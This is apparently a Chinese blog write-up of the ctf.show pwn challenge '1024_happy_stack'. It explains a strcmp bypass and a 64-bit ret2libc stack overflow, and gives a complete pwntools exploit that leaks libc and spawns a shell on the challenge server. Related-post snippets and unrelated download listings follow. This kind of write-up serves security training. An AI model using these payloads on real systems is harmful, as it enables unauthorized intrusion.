ctf.show 1024杯——1024_happy_stack

已于 2025-04-24 15:02:34 修改
阅读量241 收藏 4
点赞数 5
分类专栏: PWN-题解 ctf.show题解 文章标签: pwn
于 2025-03-03 16:29:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_88087539/article/details/145992194
版权

1024_happy_stack  64位  开了NX  strcmp函数绕过和ret2libc
gets(s);                                                                   //溢出点
if ( (unsigned int)ctfshow(s) ) 
__int64 __fastcall ctfshow(const char *a1)             //if判断                                       
return (unsigned int)strcmp(a1, "36D");                  //比较s和36D是否相同,满足条件时,向下执行
puts(s);                                                                    //输出输入值

思路:
无 system,无 "/bin/sh",所以是64位的ret2libc和strcmp函数绕过
1.通过查看ida获取偏移量,但这里为了绕过strcmp函数,需要一个'36D\x00',所以偏移量是0x380+0x8-0x4=0x384
2.64位需要ret维持堆栈平衡,同时选用puts函数只有一个参数,所以要rdi寄存器,获取ret和rdi的地址
3.构造第一个ROP链,在接受到指定位置后发送
4.然后接收到最后得到puts真实地址
5.根据puts函数得到libc的真实地址,最后根据libc地址获取system和bin_sh地址
6.构造第二条ROP链,在接受到指定位置后发送发送进行连接

连接:
EXP:
from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28250)
# io = process('/home/motaly/桌面/happy')
elf=ELF('/home/motaly/桌面/happy')
puts_got = elf.got['puts']
puts_plt = elf.symbols['puts']
main_addr = elf.symbols['main']
rdi_addr = 0x400803
ret = 0x40028a
payload = b'36D\x00'+b'a'*0x384+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.recvuntil(b"qunzhu\n\n")  //这里两个换行,因为输入就是在4.I only love qunzhu这句话的下面两行
io.sendline(payload)
io.recvuntil(b"36D\n")
puts_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.success("puts_addr:"+hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
print('libc_base-->'+hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
payload2 = b'36D\x00'+b'a'*0x384+p64(ret)+p64(rdi_addr)+p64(bin_sh)+p64(system)
io.recvuntil(b"qunzhu\n\n")
io.sendline(payload2)
io.interactive()

ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6649
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
NEWSCTF第二届--官方wp(2021.6.1萌新赛)
热门推荐
qq_55400494的博客
06-04 1万+
未经同意不得对本次比赛题目二次开发或做任何商业用途 题目源码及部分wp汇总如下 Reverse 1.2021.6.1萌新赛-re_signin 出题人:mumuzi 2.2021.6.1萌新赛-1+1的签到题 出题人:shangu 3.2021.6.1萌新赛-开门啊-1 出题人: tomPeter15 flag为ASCII可显示字符 4.2021.6.1萌新赛-开门啊-2 出题人: tomPeter15 flag为ASCII可显示字符 5.2021.6.1萌新赛-Qsay 出题人:Qfrost exp.cp
< HAPPY 1024 DAY >
闲鱼技术的博客
10-24 876
PWN-PRACTICE-CTFSHOW-6
P1umH0的博客
01-18 1883
PWN-PRACTICE-CTFSHOW-636D-MengxinStack36D-tang1024-1024_happy_stack1024-1024_happy_checkin 36D-MengxinStack 程序开了canary和PIE保护 泄露远程libc版本,为 libc6_2.23-0ubuntu10_amd64.so from pwn import * io=remote("pwn.challenge.ctf.show",28124) io.recvuntil("She said:
关于1024:堆栈下溢的错误(1024. Stack Underflow Occurred)
weixin_34075551的博客
01-13 810
http://blog.163.com/sylar_lin/blog/static/192332093201111242412487/   今天碰到个很奇怪的问题,注释掉下面的trace,realse版本才不报错。 private function onSuccess(rspObj:Object):void { // unLoading(); isbusying = ...
stack 扩展机制
happylong123hehe的专栏
12-26 408
windows中,每个线程都关联一个stackstack的默认大小是1M,用于存放临时变量,函数参数,返回地址等。 但是当一个线程开始运行的时候不是其相关stack的内存就真正被提交,因为如果一个进程有10个线程,那么如果这10个线程的stack的内存都被提交,那么虚拟内存就占用了10M,就需要想对应的页表项等开销,而且这10M到底是否被真的使用还是个未知数,所以系统的策略是只提交几个页面,然
[ctf.show 元旦水友 2024] pwn复现
weixin_52640415的博客
01-16 1392
rtld_global link_map setcontext+3d orw
1024happyCTF
weixin_51380998的博客
10-26 2045
Crypot 南无阿弥陀佛 打开题目看到如下 可以联想到佛曰密码,搜索佛曰在线解码 随即得到flag 小猪小猪 下载文件,打开即显示如下 随即想到是猪圈密码,对照猪圈密码表 解开即可得到flag 变异凯撒 下载文档后得到如下密文 vgqv]Zk\hr 根据题目可以知道,flag格式为xju{xxx} 百度凯撒密码,知道是按照一定规律,将字母进行修改 随即对照ASCII码表,可以发现如下规律 v(118)+2=x(120) g(103)+3=j(106) q(113)+4=u(117) 根据此
智慧消防大数据解决方案PPT(19页).pptx
最新发布
04-29
智慧消防安全与应急管理是现代城市安全管理的重要组成部分,随着城市化进程的加速,传统消防安全管理面临着诸多挑战,如消防安全责任制度落实不到位、消防设施日常管理不足、消防警力不足等。这些问题不仅制约了消防安全管理水平的提升,也给城市的安全运行带来了潜在风险。然而,物联网和智慧城市技术的快速发展为解决这些问题提供了新的思路和方法。智慧消防作为物联网和智慧城市技术结合的创新产物,正在成为社会消防安全管理的新趋势。 智慧消防的核心在于通过技术创新实现消防安全管理的智能化和自动化。其主要应用包括物联网消防安全监管平台、城市消防远程监控系统、智慧消防平台等,这些系统利用先进的技术手段,如GPS、GSM、GIS等,实现了对消防设施的实时监控、智能巡检和精准定位。例如,单兵定位方案通过信标点定位和微惯导加蓝牙辅助定位技术,能够精确掌握消防人员的位置信息,从而提高救援效率和安全性。智慧消防不仅提升了消防设施的管理质量,还优化了社会消防安全管理资源的配置,降低了管理成本。此外,智慧消防的应用还弥补了传统消防安全管理中数据处理方式落后、值班制度执行不彻底等问题,赋予了建筑消防设施智能化、自动化的能力。 尽管智慧消防技术在社会消防安全管理工作中的应用已经展现出巨大的潜力和优势,但目前仍处于实践探索阶段。相关职能部门和研究企业需要加大研究开发力度,进一步完善系统的功能与实效性。智慧消防的发展既面临风险,也充满机遇。当前,社会消防安全管理工作中仍存在制度执行不彻底、消防设施日常维护不到位等问题,而智慧消防理念与技术的应用可以有效弥补这些弊端,提高消防安全管理的自动化与智能化水平。随着智慧城市理念的不断发展和实践,智慧消防将成为推动社会消防安全管理工作与城市化进程同步发展的关键力量。
scratch少儿编程逻辑思维游戏源码-黄金时间.zip
04-29
scratch少儿编程逻辑思维游戏源码-黄金时间.zip
scratch少儿编程逻辑思维游戏源码-反冲枪.zip
04-29
scratch少儿编程逻辑思维游戏源码-反冲枪.zip
FlinkCDC3.2.1连接oracle11g的jar依赖
04-29
将jar包解压放到flink的lib目录下
飞机大战:精灵动力学与弹幕系统的数学交响
04-29
在二维空战游戏的华丽表象之下,精灵动画与子弹系统构建起精密的数学宇宙。本文将深入解析飞机运动学、弹幕生成算法和渲染流水线优化策略,揭示经典空战游戏背后的连续介质力学与离散事件处理的完美融合。
基于MPC轨迹跟踪技术的圆形道路运动学Carsim与Simulink联合仿真研究
04-29
内容概要:本文详细介绍了利用模型预测控制(MPC)技术,在给定圆形道路条件下进行车辆轨迹跟踪的研究。主要内容涵盖MPC轨迹跟踪的基本原理、圆形道路的轨迹规划、MPC控制器的设计及其在carsim和simulink平台上的联合仿真。文中还展示了部分用于MPC控制器设计的Python代码片段,帮助读者更好地理解和实现相关技术。最后,文章总结了MPC在车辆控制系统中的重要性和未来的发展前景。 适合人群:从事车辆工程、自动化控制领域的研究人员和技术人员,特别是对MPC技术和车辆仿真感兴趣的读者。 使用场景及目标:适用于希望深入了解MPC轨迹跟踪技术及其在车辆控制系统中应用的专业人士。目标是通过理论与仿真的结合,提升对MPC控制器的理解和实际操作能力。 其他说明:文章不仅提供了详细的理论解释,还包括具体的代码实现和仿真步骤,有助于读者从理论到实践全面掌握MPC轨迹跟踪技术。
水厂供水泵房自动化控制系统:PLC与触摸屏程序及组态软件的应用实例
04-29
内容概要:本文详细介绍了某水厂供水泵房自动化控制系统的具体实施情况,涵盖PLC程序、触摸屏程序以及组态软件程序的设计与应用。PLC部分着重于I/O分配、压力值转换及其量程校验,确保系统稳定性和安全性;触摸屏程序则涉及隐藏菜单设置,用于调试阶段的功能访问限制;组态软件关注报警处理机制,优化后的报警触发逻辑提高了系统的响应速度。此外,还分享了一些现场调试的经验和技术细节,如通讯问题解决方法、硬件安装注意事项等。 适合人群:从事工业自动化领域的工程师、技术人员,尤其是对PLC编程、HMI界面设计和SCADA系统有研究兴趣的专业人士。 使用场景及目标:适用于新建或改造水厂及其他类似行业的自动化工程项目规划与实施过程中,旨在帮助相关人员更好地理解和掌握相关技术和最佳实践。 其他说明:文中提到的具体数值和配置仅供参考,在实际项目中需要根据具体情况调整。同时强调了工程实践中的一些常见误区和应对措施,为后续项目的顺利进行提供了宝贵的经验借鉴。
scratch少儿编程逻辑思维游戏源码-节日贺卡.zip
04-29
scratch少儿编程逻辑思维游戏源码-节日贺卡.zip
少儿编程scratch项目源代码文件案例素材-铁弹.zip
04-29
少儿编程scratch项目源代码文件案例素材-铁弹.zip
基于springboot的“地方废物回收机构管理系统 ”的设计与实现(源码+数据库+文档+PPT).zip
04-29
# 基于springboot的“地方废物回收机构管理系统 ”的设计与实现(源码+数据库+文档+PPT) - 开发语言:Java - 数据库:MySQL - 技术:springboot - 工具:IDEA/Ecilpse、Navicat、Maven 管理员功能: 管理员登陆后,主要模块包括首页、个人中心、员工管理、员工请假管理、销假申请管理、工作日志管理、员工工资管理、员工任务管理、任务汇报管理、设备信息管理、设备借用管理、设备归还管理、设备报修管理、维修入库管理、员工打卡管理、员工评价管理、回收价格管理、宿舍信息管理、宿舍入住管理、宿舍搬出管理、管理员管理、系统管理等功能。 员工功能: 员工登陆后,主要模块包括首页、个人中心、员工请假管理、销假申请管理、工作日志管理、员工工资管理、员工任务管理、任务汇报管理、设备信息管理、设备借用管理、设备归还管理、设备报修管理、维修入库管理、员工打卡管理、员工评价管理、回收价格管理、宿舍入住管理、宿舍搬出管理等功能。
ctf.show单身pwn
01-04
### 关于CTF比赛中PWN题目的解题思路 在处理CTF比赛中的PWN题目时,理解漏洞利用的基础非常重要。对于`firmianay/CTF-All-In-One`项目中提到的内容[^1],可以发现该项目提供了丰富的资源来帮助参赛者理解和解决不同类型的挑战。 #### PWN题目概述 PWN类题目通常涉及对存在安全缺陷的服务进行攻击,这些服务可能运行着有漏洞的程序。常见的目标包括溢出漏洞、格式化字符串漏洞以及其他内存破坏型错误。通过精心构造输入数据,选手能够控制受影响进程的行为并执行任意代码。 #### 解决方案框架 针对具体案例如“单身”的PWN题目,一般遵循如下方法论: 1. **环境搭建** - 使用Docker或其他虚拟化技术创建隔离测试环境。 - 安装必要的工具链(GDB调试器、pwntools库等)以便分析二进制文件和服务行为。 2. **逆向工程与静态分析** - 利用IDA Pro或Radare2等反汇编工具查看二进制结构。 - 运行远程服务器上的易受攻击应用实例。 - 结合本地副本,在真实条件下测试假设条件下的攻击模式有效性。 4. **开发exploit脚本** - 编写Python脚本来自动化整个过程,从连接到目标直到获取shell权限。 - 考虑多种因素如ASLR(地址空间布局随机化)绕过技巧的应用。 5. **提交flag** - 成功获得shell后读取指定路径下存储的秘密标志(flag),完成任务。 ```python from pwn import * # 设置日志级别为debug方便观察细节 context.log_level = 'debug' # 建立TCP连接至远端主机 conn = remote('challenge.ctf.show', port) # 发送恶意载荷触发漏洞... payload = b'A' * offset + pack(shellcode_address, 32) conn.sendline(payload) # 接收响应消息直至结束符出现 response = conn.recvuntil(b'\n') print(response.decode()) # 清理工作 conn.close() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值